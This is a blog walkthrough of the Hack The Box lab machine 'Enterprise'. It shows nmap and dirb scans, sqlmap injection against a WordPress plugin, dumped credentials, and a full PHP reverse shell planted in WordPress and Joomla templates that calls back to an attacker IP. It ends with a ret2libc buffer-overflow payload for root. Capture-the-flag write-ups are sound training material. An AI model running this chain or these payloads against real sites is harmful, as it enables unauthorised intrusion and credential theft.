Enterprise HacktheBox Walkthrough - Hackthebox Enterprise Writeup


Hello Everyone, here is Enterprise Hackthebox walkthrough. Enterprise machine is one of the most difficult and challenging box, I took quite a lot of time to crack this box and felt motivated to write about this. Enumeration is hard on this machine, after making your way to user – you need to exploit a binary with got buffer overflow vulnerability, which is pretty simple. Also, ASLR is turned off on this box which made things much more easier. So, lets dig in 


 
Enterprise Hackthebox walkthrough
Enterprise Hackthebox walkthrough
As usual, first comes Reconnaissance 

map -sS -sV -A -o enterprise.nmap 10.10.10.61
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-24 17:18 IST
Nmap scan report for enterprise.htb (10.10.10.61)
Host is up (0.15s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 7.4p1 Ubuntu 10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:e9:8c:c5:b5:52:23:f4:b8:ce:d1:96:4a:c0:fa:ac (RSA)
|   256 f3:9a:85:58:aa:d9:81:38:2d:ea:15:18:f7:8e:dd:42 (ECDSA)
|_  256 de:bf:11:6d:c0:27:e3:fc:1b:34:c0:4f:4f:6c:76:8b (ED25519)
80/tcp   open  http     Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
443/tcp  open  ssl/http Apache httpd 2.4.25 ((Ubuntu))
|_http-server-header: Apache/2.4.25 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
| ssl-cert: Subject: commonName=enterprise.local/organizationName=USS Enterprise/stateOrProvinceName=United Federation of Planets/countryName=UK
| Not valid before: 2017-08-25T10:35:14
|_Not valid after:  2017-09-24T10:35:14
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
8080/tcp open  http     Apache httpd 2.4.10 ((Debian))
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
| http-robots.txt: 15 disallowed entries 
| /joomla/administrator/ /administrator/ /bin/ /cache/ 
| /cli/ /components/ /includes/ /installation/ /language/ 
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=8/24%OT=22%CT=1%CU=30331%PV=Y%DS=2%DC=T%G=Y%TM=5D61246
OS:7%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10D%TI=Z%CI=I%II=I%TS=8)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1723/tcp)
HOP RTT       ADDRESS
1   150.54 ms 10.10.14.1
2   150.61 ms enterprise.htb (10.10.10.61)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 84.45 seconds


In the about nmap output I scanned with only -A switch as it’s enough for this box, but always prefer to scan all the ports. There are many ways to crack this box, but I will show you the simplest way to crack it without making it complicated. If you wanna get to know all the routes of this box – go for ippsec :P 

 Lets do some brute forcing for directories on 80,8080 & 443 ports
dirb https://10.10.10.61/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Aug 24 17:43:23 2019
URL_BASE: https://10.10.10.61/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: https://10.10.10.61/ ----
==> DIRECTORY: https://10.10.10.61/files/                                      
+ https://10.10.10.61/index.html (CODE:200|SIZE:10918)                         
+ https://10.10.10.61/server-status (CODE:403|SIZE:300)                        
                                                                               
---- Entering directory: https://10.10.10.61/files/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Sat Aug 24 17:55:01 2019
DOWNLOADED: 4612 - FOUND: 2
dirb http://10.10.10.61/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Aug 24 17:45:29 2019
URL_BASE: http://10.10.10.61/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

                                                                     
GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.61/ ----
                                                                     + http://10.10.10.61/index.php (CODE:200|SIZE:292)                  
+ http://10.10.10.61/server-status (CODE:403|SIZE:299)              
                                                                     
==> DIRECTORY: http://10.10.10.61/wp-admin/
                                                                     ==> DIRECTORY: http://10.10.10.61/wp-content/==> DIRECTORY: http://10.10.10.61/wp-includes/
+ http://10.10.10.61/xmlrpc.php (CODE:200|SIZE:92)                  
                                                                    
---- Entering directory: http://10.10.10.61/wp-admin/ ----
                                                                     + http://10.10.10.61/wp-admin/admin.php (CODE:200|SIZE:292)         
                                                                    
 ==> DIRECTORY: http://10.10.10.61/wp-admin/css/
                                                                    
 ==> DIRECTORY: http://10.10.10.61/wp-admin/images/
                                                                     
==> DIRECTORY: http://10.10.10.61/wp-admin/includes/
+ http://10.10.10.61/wp-admin/index.php (CODE:200|SIZE:292)         
                                                                    
 ==> DIRECTORY: http://10.10.10.61/wp-admin/js/
                                                                     
==> DIRECTORY: http://10.10.10.61/wp-admin/maint/
                                                                    
 ==> DIRECTORY: http://10.10.10.61/wp-admin/network/
                                                                     
==> DIRECTORY: http://10.10.10.61/wp-admin/user/
                                                                    
---- Entering directory: http://10.10.10.61/wp-content/ ----
                                                                     + http://10.10.10.61/wp-content/index.php (CODE:200|SIZE:0)         
                                                                   
  ==> DIRECTORY: http://10.10.10.61/wp-content/languages/
                                                                   
  ==> DIRECTORY: http://10.10.10.61/wp-content/plugins/
                                                                    
 ==> DIRECTORY: http://10.10.10.61/wp-content/themes/
                                                                    
 ==> DIRECTORY: http://10.10.10.61/wp-content/upgrade/
                                                                     
==> DIRECTORY: http://10.10.10.61/wp-content/uploads/
                                                                    
---- Entering directory: http://10.10.10.61/wp-includes/ ----
                                                                                                                                          ==> DIRECTORY: http://10.10.10.61/wp-includes/certificates/
                                                                     
==> DIRECTORY: http://10.10.10.61/wp-includes/css/                                                                     
==> DIRECTORY: http://10.10.10.61/wp-includes/customize/                                                                     
==> DIRECTORY: http://10.10.10.61/wp-includes/fonts/                                                                    
==> DIRECTORY: http://10.10.10.61/wp-includes/images/                                                                    
==> DIRECTORY: http://10.10.10.61/wp-includes/js/                                                                    
==> DIRECTORY: http://10.10.10.61/wp-includes/widgets/
                                                                    
---- Entering directory: http://10.10.10.61/wp-admin/css/ ----
                                                                                                                                         
---- Entering directory: http://10.10.10.61/wp-admin/images/ ----
                                                                                                                                         
---- Entering directory: http://10.10.10.61/wp-admin/includes/ ----
                                                                     + http://10.10.10.61/wp-admin/includes/admin.php (CODE:200|SIZE:149)
                                                                    
---- Entering directory: http://10.10.10.61/wp-admin/js/ ----
                                                                                                                                          ==> DIRECTORY: http://10.10.10.61/wp-admin/js/widgets/
                                                                    
---- Entering directory: http://10.10.10.61/wp-admin/maint/ ----
                                                                                                                                         
---- Entering directory: http://10.10.10.61/wp-admin/network/ ----
                                                                     + http://10.10.10.61/wp-admin/network/admin.php (CODE:200|SIZE:292) 
+ http://10.10.10.61/wp-admin/network/index.php (CODE:200|SIZE:292) 
                                                                    
---- Entering directory: http://10.10.10.61/wp-admin/user/ ----
                                                                     + http://10.10.10.61/wp-admin/user/admin.php (CODE:200|SIZE:292)    
+ http://10.10.10.61/wp-admin/user/index.php (CODE:200|SIZE:292)    
                                                                    
---- Entering directory: http://10.10.10.61/wp-content/languages/ ----
dirb http://10.10.10.61:8080

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Aug 24 20:48:05 2019
URL_BASE: http://10.10.10.61:8080/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

                                                                   
GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.61:8080/ ----
                                                                   
+ http://10.10.10.61:8080/0 (CODE:200|SIZE:266)                   
+ http://10.10.10.61:8080/01 (CODE:200|SIZE:266)                  
+ http://10.10.10.61:8080/02 (CODE:200|SIZE:266)                  
+ http://10.10.10.61:8080/1 (CODE:200|SIZE:266)                   
+ http://10.10.10.61:8080/1x1 (CODE:200|SIZE:266)                 
+ http://10.10.10.61:8080/2 (CODE:200|SIZE:266)                   
+ http://10.10.10.61:8080/2g (CODE:200|SIZE:266)                  
+ http://10.10.10.61:8080/about (CODE:200|SIZE:266)               
+ http://10.10.10.61:8080/About (CODE:200|SIZE:266)                
==> DIRECTORY: http://10.10.10.61:8080/administrator                                                                   
==> DIRECTORY: http://10.10.10.61:8080/bin/                                                                   
==> DIRECTORY: http://10.10.10.61:8080/cache/
  


I feel like port 80 & 8080 are interesting and nmap scan states that Joomla is running on port 8080. Let’s check port 80 first. We can see that its asking for HTTPS. Lets fire dirb. 


Useful Info From Dirb:
Port 80 --> Wordpress (http://10.10.10.61/wp-admin, http://10.10.10.61/wp-content)
Port 8080 --> Joomla (http://10.10.10.61/administrator)
  


We can see two domain names enterprise.htb and enterprise.local. lets add the to /etc/hosts to see what’s there in that. Now the web page renders properly

echo "10.10.10.61 enterprise.local enterprise.htb" > /etc/hosts
Let’s try to access https://10.10.10.61/files --> we got a file named lcars.zip in that folder. Lets download it

curl -k https://10.10.10.61/files/lcars.zip --output lcar.zip 
 Lets unzip the file and check the content in the zip file
Lcars.php
<?php
/*
*     Plugin Name: lcars
*     Plugin URI: enterprise.htb
*     Description: Library Computer Access And Retrieval System
*     Author: Geordi La Forge
*     Version: 0.2
*     Author URI: enterprise.htb
*                             */

// Need to create the user interface. 

// need to finsih the db interface

// need to make it secure

?> 
 lcars_db.php
<?php
include "/var/www/html/wp-config.php";
$db = new mysqli(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);
// Test the connection:
if (mysqli_connect_errno()){
    // Connection Error
    exit("Couldn't connect to the database: ".mysqli_connect_error());
}


// test to retireve an ID
if (isset($_GET['query'])){
    $query = $_GET['query'];
    $sql = "SELECT ID FROM wp_posts WHERE post_name = $query";
    $result = $db->query($sql);
    echo $result;
} else {
    echo "Failed to read query";
} ?> 
 lcars_dbpost.php
<?php
include "/var/www/html/wp-config.php";
$db = new mysqli(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);
// Test the connection:
if (mysqli_connect_errno()){
    // Connection Error
    exit("Couldn't connect to the database: ".mysqli_connect_error());
}


// test to retireve a post name
if (isset($_GET['query'])){
    $query = (int)$_GET['query'];
    $sql = "SELECT post_title FROM wp_posts WHERE ID = $query";
    $result = $db->query($sql);
    if ($result){
        $row = $result->fetch_row();
        if (isset($row[0])){
            echo $row[0];
        }
    }
} else {
    echo "Failed to read query";
} ?> 
Just by going through these files we can understand that lcars is a wordpress plugin and the db files are vulnerable to SQL injection. So, lets try some sql Injection on lcars plugin. lets go to http://10.10.10.61/wp-content/plugins/lcars/lcars_db.php and try to pass a query to give the query to sqlmap to exploit it.


we got multiple Databses from sqlmap, in which wordpress and joomladb looks interesting.
Dumping Wordpress Database

Sqlmap  -u "http://10.10.10.61/wp-content/plugins/lcars/lcars_db.php?query=50"
--dbms=mysql -D wordpress --dump

Output:
ID,user_url,user_pass,user_login,user_email,user_status,display_name,user_nicename,user_registered,user_activation_key
1,<blank>,$P$BFf47EOgXrJB3ozBRZkjYcleng2Q.2.,william.riker,william.riker@enterprise.htb,0,william.riker,william-riker,2017-09-03 19:20:56,<blank>


Info Gathered from output:

Usernames:  william.riker 
  
Dumping Joomadb Database

Sqlmap  -u "http://10.10.10.61/wp-content/plugins/lcars/lcars_db.php?query=50"
--dbms=mysql -D joomladb --dump

Output:
id,name,otep,email,block,otpKey,params,username,password,sendEmail,activation,resetCount,registerDate,requireReset,lastResetTime,lastvisitDate
400,Super User,<blank>,geordi.la.forge@enterprise.htb,0,<blank>,"{""admin_style"":"""",""admin_language"":"""",""language"":"""",""editor"":"""",""helpsite"":"""",""timezone"":""""}",geordi.la.forge,$2y$10$cXSgEkNQGBBUneDKXq9gU.8RAf37GyN7JIrPE7us9UBMR9uDDKaWy,1,0,0,2017-09-03 19:30:04,0,0000-00-00 00:00:00,2017-10-17 04:24:50
401,Guinan,<blank>,guinan@enterprise.htb,0,<blank>,"{""admin_style"":"""",""admin_language"":"""",""language"":"""",""editor"":"""",""helpsite"":"""",""timezone"":""""}",Guinan,$2y$10$90gyQVv7oL6CCN8lF/0LYulrjKRExceg2i0147/Ewpb6tBzHaqL2q,0,<blank>,0,2017-09-06 12:38:03,0,0000-00-00 00:00:00,0000-00-00 00:00:00

Passwords Gathered from output: 

ZxJyhGem4k338S2Y
ZD3YxfnSjezg67JZ  
enterprisencc170
u*Z14ru0p#ttj83zS6

Users: geordi.la.forge    Super Admin 

Lets try combining those credentials and try logging into wordpress and joomla. After some trail and error we can find that
Wordpress:  
Username: william.riker
Password: u*Z14ru0p#ttj83zS6

We can see the username just by going through the website as well.
Enterprise Hackthebox walkthrough


Joomla:
Username: geordi.la.forge
Password: ZD3YxfnSjezg67JZ

You can login to either wordpress or joomla and get a shell very easily. Lets go through both the methods.

Getting a Shell through Wordpress:

Login to http://10.10.10.61/wp-admin with the above given credentials and go to appearance --> editor --> Add PHP reverse shell code in any page. Here I added the Reverse shell code in template-tags.php page and saved it. 

Enterprise Hackthebox walkthrough


 PHP Reverse Shell: Add this in the template-tags.php file. you need not add <?php ?> tags as the php tags are already available in the template-tags.php file.
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.21';  // CHANGE THIS
$port = 9002;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
 // Fork and have the parent process exit
 $pid = pcntl_fork();
 
 if ($pid == -1) {
  printit("ERROR: Can't fork");
  exit(1);
 }
 
 if ($pid) {
  exit(0);  // Parent exits
 }

 // Make the current process a session leader
 // Will only succeed if we forked
 if (posix_setsid() == -1) {
  printit("Error: Can't setsid()");
  exit(1);
 }

 $daemon = 1;
} else {
 printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
 printit("$errstr ($errno)");
 exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
 printit("ERROR: Can't spawn shell");
 exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
 // Check for end of TCP connection
 if (feof($sock)) {
  printit("ERROR: Shell connection terminated");
  break;
 }

 // Check for end of STDOUT
 if (feof($pipes[1])) {
  printit("ERROR: Shell process terminated");
  break;
 }

 // Wait until a command is end down $sock, or some
 // command output is available on STDOUT or STDERR
 $read_a = array($sock, $pipes[1], $pipes[2]);
 $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

 // If we can read from the TCP socket, send
 // data to process's STDIN
 if (in_array($sock, $read_a)) {
  if ($debug) printit("SOCK READ");
  $input = fread($sock, $chunk_size);
  if ($debug) printit("SOCK: $input");
  fwrite($pipes[0], $input);
 }

 // If we can read from the process's STDOUT
 // send data down tcp connection
 if (in_array($pipes[1], $read_a)) {
  if ($debug) printit("STDOUT READ");
  $input = fread($pipes[1], $chunk_size);
  if ($debug) printit("STDOUT: $input");
  fwrite($sock, $input);
 }

 // If we can read from the process's STDERR
 // send data down tcp connection
 if (in_array($pipes[2], $read_a)) {
  if ($debug) printit("STDERR READ");
  $input = fread($pipes[2], $chunk_size);
  if ($debug) printit("STDERR: $input");
  fwrite($sock, $input);
 }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
 if (!$daemon) {
  print "$string\n";
 }
}

Start a netcat connection to get reverse shell: Listening:
nc -nvlp 9002
 Now go to any page and click on the tag to get a Shell
Enterprise Hackthebox walkthrough
Now you can get the reverse shell on your netcat terminal: but its not the shell we are looking for. IP address is different. we are supposed to be on 10.10.10.61, but we are on 172.17.0.3 and user.txt says "This is not Enterprise"
Enterprise Hackthebox walkthrough

Getting a Shell through Joomla:

Now lets try to get a shell through joomla using http://10.10.10.61:8080/administrator the above given credentials.
Enterprise Hackthebox walkthrough


Lets try exploiting this in the same way as  wordpress, this time lets go after the index page. Add/replace the php reverse shell script into the index page
Enterprise Hackthebox walkthrough

Start a netcat connection. Open 10.10.10.61/index.php to get the shell, but its still the same shell. got nothing more. we need to try in a different way to get the shell.
 

Getting a Proper Shell

I started enumerating more in the same shell to find some interesting stuff after some enumeration i found that https://10.10.10.61/files and wordpress shares the same location. I found this by looking at directory named files and it got lcars.zip file in /var/www/html/. So lets try creating a php reverse shell into /var/www/html/files/. Start a netcat connection and you will get the shell.
Enterprise Hackthebox walkthrough

and that's how we get the user shell with user.txt file.   
Enterprise Hackthebox walkthrough


After a little bit of enumeration i found an interesting file.
Enterprise Hackthebox walkthrough

Download this file into our system by converting the binary into base64. Lets try running that file and it asks for a password, so lets use ltrace to see what this application is doing. Its using a string compare function with a string "pricarda1" so thats the password. 

Enterprise Hackthebox walkthrough


Lets check if this binary is vulnberable to buffer overflow or not. After trail and error, i found out that the 4th function is vulnerable to buffer over flow.
lcars vulnerable to buffer overflow


As we found that lcars is vulnerable to buffer overflow, lets debug it in gdb. Let's send some random garbage data as an input using gdb to find out how many bytes we need to overwrite EIP register. Copy the junk data created using pattern_create and pass it when it ask for "Enter Security Override"
gdb ./lcars
pattern_create 500
r JUNK_DATA

When you send the junk data as input, you can see that some data is overflowed into EIP. we need to find the number of bytes we need - to get our data into EIP register. We can see that our binary is binary is breaking after 212 bytes of data.
pattern_offset %$A%             \\Gives the number of bytes after which 
Enterprise Hackthebox walkthrough


Run "checksec" & "aslr" to check which security protections are enabled on the application. we can see that ASLR is turned off. 
checksec
aslr
Enterprise Hackthebox walkthrough


lets Check if ASLR is "Turned" ON or OFF on Target Machine. 
ASLR on the Target machine is turned off as well.
If the Value is "0"  = ASLR Turned off
If the value is "2"  = ASLR is turned on
cat /proc/sys/kernel/randomize_va_space
Enterprise Hackthebox walkthrough


we got lucky as ASLR is turned off, or else we need to brute force aslr to get root shell. If you wanna know how to get root shell when ASLR is turned check out my hackthebox Ocotober Walkthrough. So, in order to get root shell we need to pass address of "System" + "Exit" + "/bin/sh".
p system
p exit 
find &system,+9999999, "sh"
Enterprise Hackthebox walkthrough

We found all the required addresses 
offset 212 
system 0xf7e4c060 
exit  0xf7e3faf0 
sh    0xf7f6ddd5

Now lets combine all the required values and create our payload. we need to pass the variables in little endian format. we need to create some junk data of 212 bytes. we can create JUNK data using python
python -c "print 'A' * 212"


output:

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

System +Exit + "/bin/sh" in Little Endian format
\x60\xc0\xe4\xf7\xf0\xfa\xe3\xf7\xd5\xdd\xf6\xf7

Our final Payload looks like ('212*A' + System + Exit + /bin/sh )
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x60\xc0\xe4\xf7\xf0\xfa\xe3\xf7\xd5\xdd\xf6\xf7

Lets run our exploit :P  and here we get our root shell. What happened here is - when we passed 212 bytes of Junk data, it fills up the variable and it cannot accomodte the rest of the data sent into it, so it overflows into EIP. Then our (System+exit+sh) will be sent into EIP which gets executed because of system and exit helps in better connection.
Hackthebox enterprise root

Well, thats how you crack enterprise. if you looking for a clear explanation of Buffer over flow go through my HackTheBox October walkthrough once. 


==================       HACKING DREAM      ===================

Main Principle of My Hacking Dream is to Promote Hacking Tricks and Tips to All the People in the World, So That Everyone will be Aware of Hacking and protect themselves from Getting Hacked. Hacking Don’t Need Agreements.

I Will Be Very Happy To Help You, So For Queries or Any Problem Comment Below or You Can Mail Me At Bhanu@HackingDream.net
Bhanu Namikaze

Bhanu Namikaze is an Ethical Hacker, Web Developer, Student and Mechanical Engineer. He Enjoys writing articles, Blogging, Solving Errors and Social Networking. Feel Free to let me know any of your concerns about hacking or let me know if you need any more methods on hacking anything. Enjoy Learning

No comments:

Post a Comment